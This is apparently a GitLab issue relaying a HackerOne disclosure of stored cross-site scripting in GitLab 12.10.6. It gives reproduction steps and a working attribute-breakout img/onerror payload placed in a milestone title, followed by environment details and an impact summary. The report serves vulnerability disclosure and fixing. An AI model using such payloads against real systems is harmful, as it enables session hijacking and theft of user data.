
Closed
Open
Opened May 19, 2020 by GitLab SecurityBot (@gitlab-securitybot, Reporter)

Stored XSS in issue pages

HackerOne report #877065 by mike12 on 2020-05-18, assigned to @cmaxim:

Hello Gitlab!

Steps to reproduce

  1. Run GitLab: docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
  2. Create a new Gitlab project
  3. Go to Issues->Milestones
  4. Create a new milestone with the following title: <img alt="<x" title="/><img src=x onerror=alert(1)>">
  5. Go to Issues->List
  6. Create a new issue with the milestone created in step 4
  7. Collapse the right sidebar (1.png)
  8. Hover over the milestone icon

2.png
3.png

My GitLab version

root@gitlab:/# gitlab-rake gitlab:env:info

System information  
System:		  
Current User:	git  
Using RVM:	no  
Ruby Version:	2.6.5p114  
Gem Version:	2.7.10  
Bundler Version:1.17.3  
Rake Version:	12.3.3  
Redis Version:	5.0.7  
Git Version:	2.26.2  
Sidekiq Version:5.2.7  
Go Version:	unknown

GitLab information  
Version:	12.10.6  
Revision:	833223f2a7f  
Directory:	/opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:	PostgreSQL  
DB Version:	11.7  
URL:		http://gitlab.example.com  
HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
Using LDAP:	no  
Using Omniauth:	yes  
Omniauth Providers: 

GitLab Shell  
Version:	12.2.0  
Repository storage paths:  
- default: 	/var/opt/gitlab/git-data/repositories  
GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
Git:		/opt/gitlab/embedded/bin/git  

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data
  3. Steal user's credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • 2.png
  • 1.png
  • 3.png
Milestone: 13.2 (Past due)
Due date: Jul 24, 2020
Reference: gitlab-org/gitlab#218448